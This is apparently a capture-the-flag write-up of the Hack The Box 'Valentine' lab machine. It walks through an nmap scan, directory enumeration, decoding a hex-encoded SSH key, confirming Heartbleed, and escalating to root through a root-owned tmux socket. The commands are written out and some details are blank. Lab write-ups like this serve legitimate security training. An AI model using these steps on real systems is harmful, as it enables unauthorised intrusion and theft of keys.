Hack the box valentine writeup



It is a easy linux machine from hack the box.

It involves little enumeration and then decoding a key followed by finding the vulnerability through the hint given on the website .

It involves simple privilege escalation with tmux

Steps involved

1-Port Scan
2-Directory enumeration
3-Decoding Hype's key
4-Exploiting Heartbleed
5-Getting User.txt
6-Privilage escalation via tmux
7--Getting Root.txt

Commands involved

1-nmap -sC -sV -O -v -oV
3-sed 's/ //g' id_rsa> rsa
4-nmap -p 443 --script ssl-heartbleed -Pn
5-ssh -i id_rsa [email protected]
6-ps aux
7-/usr/bin/tmux -S /.dev/dev_sess

Port Scan

Nmap 7.70 scan initiated Sun Apr 26 11:43:39 2020 as: nmap -sC -sV -O -v -oV
 Increasing send delay for from 0 to 5 due to 173 out of 576 dropped probes since last increase.
 Nmap scan report for
 Host is up (0.27s latency).
 Not shown: 997 closed ports
 22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
 |   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
 |_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
 80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
 | http-methods: 
 |_  Supported Methods: GET HEAD POST OPTIONS
 |http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu)) | http-methods:  |  Supported Methods: GET HEAD
 |_http-server-header: Apache/2.2.22 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html).
 | ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
 | Issuer: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
 | Public Key type: rsa
 | Public Key bits: 2048
 | Signature Algorithm: sha1WithRSAEncryption
 | Not valid before: 2018-02-06T00:45:25
 | Not valid after:  2019-02-06T00:45:25
 | MD5:   a413 c4f0 b145 2154 fb54 b2de c7a9 809d
 |_SHA-1: 2303 80da 60e7 bde7 2ba6 76dd 5214 3c3c 6f53 01b1
 |_ssl-date: 2020-04-26T15:49:15+00:00; +4m04s from scanner time.
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
 TCP/IP fingerprint:
 Uptime guess: 205.413 days (since Fri Oct  4 01:50:23 2019)
 Network Distance: 2 hops
 TCP Sequence Prediction: Difficulty=247 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Host script results:
 |_clock-skew: mean: 4m03s, deviation: 0s, median: 4m03s
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Sun Apr 26 11:45:25 2020 -- 1 IP address (1 host up) scanned in 107.38 seconds

The first thing i always do is visit the website and run the directory enumeration tool in the mean while
Hack the box valentine writeup

Directory Enumeration

Used dirb tool from kali linux

Hack the box valentine writeup

Got /dev let’s check what is in it.

Hack the box valentine writeup

It has hype’s key and notes.txt.

Hack the box valentine writeup

Decoding Hype’s key

It looks like it is in hex format .So let’s decode it according to notes.txt

Hack the box valentine writeup

Used Brup suit for this process.

Hack the box valentine writeup

Used ASCII hex to decode it.

Then the problem was that it had spaces so i googled how to remove the and got this .Which worked fine.

Hack the box valentine writeup

Exploiting Heartbleed

The pic on the website a hint that it might be vulnerable to heart bleed.

[email protected]:~/Desktop/htb/valentin# nmap -p 443 --script ssl-heartbleed -Pn
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-01 03:45 EDT
Nmap scan report for valentine.htb (
Host is up (0.49s latency).
443/tcp open https
| ssl-heartbleed:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds

Searched for many exploits but the one which worked was .

Hack the box valentine writeup

Getting user.txt

Now we have the key phrase also we can login into Hype’s account using ssh.

ssh -i id_rsa [email protected]
Hack the box valentine writeup

Privilege escalation

ps aux

Simply i ran ps aux to see the process running and found tmux session running as root so i used that for privilege escalation.

/usr/bin/tmux -S /.dev/dev_sess
Hack the box valentine writeup

Getting Root.txt

Now we can read the root.txt

Hack the box valentine writeup

How useful was this post?

Click on a star to rate it!

Average rating 5 / 5. Vote count: 1

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment